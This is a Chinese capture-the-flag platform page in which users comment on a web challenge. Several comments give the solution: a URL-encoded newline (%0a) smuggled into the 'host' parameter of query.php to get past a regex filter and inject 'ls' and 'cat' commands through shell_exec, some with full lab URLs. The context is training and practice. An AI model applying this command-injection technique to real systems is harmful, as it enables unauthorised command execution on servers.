评分(2)
解题动态
风花雪月 攻破了该题 2天前
sawm 攻破了该题 3天前
1mm0rt41 攻破了该题 4天前
vb嘎嘎 攻破了该题 4天前
wdsj 攻破了该题 4天前
wrcoco 攻破了该题 5天前
洛123 攻破了该题 6天前
晨曦静夜 攻破了该题 6天前
bugbiubiubiu 攻破了该题 6天前
Zfc 攻破了该题 7天前
btking 攻破了该题 8天前
nnyylove 攻破了该题 8天前
乔qiao 攻破了该题 8天前
dddddddwww 攻破了该题 11天前
wzdhsgfagjf 攻破了该题 11天前
随性 攻破了该题 12天前
时肆 攻破了该题 12天前
lover 攻破了该题 12天前
lizhibin 攻破了该题 13天前
评论
晨曦静夜 6天前
举报
先列出当前目录,找到可疑文件 query.php?host=whois.verisign-grs.com%0A&query=ls 然后读取这个文件 /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
KING12366 6月前
举报
Ai agent已经AK了 一把嗦 直接把网站给他就ak了 CTF没法玩了
ndzdb 4月前
举报
有git吗~大佬
another2001 9月前
举报
?host=ab%0a 这是因为在默认的情况下, 正则表达式$匹配的是可见字符的末尾
chenrujun 1年前
举报
BP抓包,绕过正则匹配过滤,host 和query 拼接成命令显示flag host=whois.verisign-grs.com%0a,%0a表示回车 query=ls查看当前目录文件 host=whois.verisign-grs.com%0a,%0a表示回车 query=cat 文件名
Kokomi-FIRE 1年前
举报
好像是利用参数拼接命令的玩意儿,得URL编码绕过
MoCaser 1年前
举报
不懂的建议花金币看看wp
000ooo 1年前
举报
①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
zzz666 1年前
举报
@cyffk 空格和换行会被url编码
cyffk 1年前
举报
为什么%不会被过滤?
Zhumeng 1年前
举报
查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码
admin9101 1年前
举报
http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
MOCHAOLIN 2年前
举报
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf